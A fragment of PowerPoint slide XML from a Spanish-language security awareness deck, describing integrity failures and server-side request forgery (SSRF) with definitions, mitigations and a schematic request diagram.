              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> y la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>infraestructura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> que no protegen contra las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>violaciones de la integridad</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30" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{631E89F3-59FB-616E-0E1C-F4FF55D34F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1985967" y="3141990"/>
            <a:ext cx="6189312"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Vulnerabilidad a la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserialización insegura</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, dependencia de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>plugins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librerías</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>módulos de fuentes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repositorios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> no confiables…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Imagen 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{942BBC6C-1AB0-6202-4378-D41C9EDFC3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004" y="1742703"/>
            <a:ext cx="801800" cy="801800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Imagen 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{498789AD-1828-328E-23EB-E85478994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871" y="3280002"/>
            <a:ext cx="724065" cy="724065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Imagen 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC103E6-6312-2735-6D78-D42C2BC4D2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420" y="4990127"/>
            <a:ext cx="634620" cy="634620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CCF15AB-C0B1-2050-AA15-740A189C41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7059"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8619783" y="1491118"/>
            <a:ext cx="3572217" cy="389631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BB726FEA-E805-B405-8A08-B0B5190D327D}"/>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3310343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49E8C-78CD-0AD3-A0AC-EB654078CA2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2CE59C9-B4E4-6AEA-4AB6-E084B2E2FD1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3A0F20C-8FFD-9396-4F22-6C36D3D6BE1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10. Falsificación de solicitudes de lado del Servidor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C20725F-6C78-9CA1-F8CD-8799FDBBD6B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3" name="Oval 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03C31BB8-7EDF-DC2D-EBA7-50CE651A1237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496793" y="4739432"/>
            <a:ext cx="1034469"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4" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04EF7B50-6CA9-9669-327E-B82BE5C4587C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496793" y="1576361"/>
            <a:ext cx="1034469"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5" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B158C62A-70D7-5A70-AFC4-4B7F0A0C522C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496793" y="3097842"/>
            <a:ext cx="1034469"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6" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9886D853-1A0F-40C5-F826-28676810D8F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2086747" y="1485163"/>
            <a:ext cx="6356558"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Se produce cuando una aplicación web obtiene un recurso remoto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sin validar la URL proporcionada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>el usuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. Permite a un atacante coaccionar a la aplicación para que envíe una solicitud manipulada a un destino inesperado. </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47DBAE0F-2AF6-B9D5-33EA-69647D0A3188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2086747" y="3030066"/>
            <a:ext cx="6213297"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La incidencia Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (SSRF) está </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>aumentando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> y la gravedad de la SSRF es cada vez mayor debido a los servicios en la nube y a la complejidad de las arquitecturas. </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFCBD6ED-4F58-B7A6-CE5F-ACA2A2BD9D97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2013610" y="4670929"/>
            <a:ext cx="6213298"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Prevención mediante aplicación de políticas de firewall de “denegación por defecto”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sanear y validar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> todos los datos de entrada suministrados por el cliente, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>desactivar redirecciones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> HTTP… </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Imagen 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{378B360C-6E90-53BD-55A9-383E6701C3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825" y="1827392"/>
            <a:ext cx="564410" cy="602837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Imagen 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E324D910-AC30-A12F-1C7A-D7D050A0F0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825" y="4990462"/>
            <a:ext cx="564410" cy="602837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1433F5C-439A-379A-A6C6-444B687D40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6476" y="3348873"/>
            <a:ext cx="564410" cy="602837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Marcador de posición de imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC10DF7-B5C6-B524-5B46-3C073CE7C4F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="3960"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="1289247"/>
            <a:ext cx="3048000" cy="4687011"/>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0104132A-6F5D-F0D6-AA39-4E787165C5C9}"/>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9020414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B87B-C27D-0DA4-9374-97BF512D9026}"/>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886C99F-818F-0C20-C171-C332E1D3E804}"/>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324F947-99D0-03E1-64FC-D1131C0C92B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10. Falsificación de solicitudes de lado del Servidor - Ejemplo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E55ED31-D3CA-AA06-E403-4BB6ABB09DF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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{412BD86D-6813-96D9-A77E-24073136081E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="741816" y="3317496"/>
            <a:ext cx="1117273" cy="1662463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4488E141-B564-08C2-7914-53AA8D8FF35A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188254" y="3530875"/>
            <a:ext cx="1232969" cy="1283084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CuadroTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9B5EBC-FF2E-23E9-3FD7-1D6AA2D29C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569262" y="4352938"/>
            <a:ext cx="146237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600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cliente malicioso</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{426E1C89-0057-D9B9-A284-BD42672AE8DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4994984" y="5112243"/>
            <a:ext cx="1462379"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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Aplicación vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3DFCA39-7E78-D1EA-141B-D14E26A57169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9378319" y="4872444"/>
            <a:ext cx="1980394"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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Otro recurso interno</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CuadroTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04C0D04F-2151-600E-4EFD-FBDC6339F70C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1748378" y="2339619"/>
            <a:ext cx="4119786"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Petición maliciosa con referencia a recurso interno</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>(GET /?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>=http://recurso.com )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CuadroTexto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F40D91-2418-282A-2193-7B257C5BAE77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6064196" y="2218351"/>
            <a:ext cx="375307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Petición no filtrada con origen aplicación vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>(GET /HTTP/1.1 | Host: recurso.com)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9" descr="Imagen que contiene interior, planta, oscuro, computadora&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBC53FA5-D2D1-4E9D-14E2-1B269A92D89A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5868164" y="4169517"/>
            <a:ext cx="458728" cy="439455"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Arrow: Right 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87F85A51-59CB-84A6-9C74-77A423137D39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2233356" y="3501793"/>
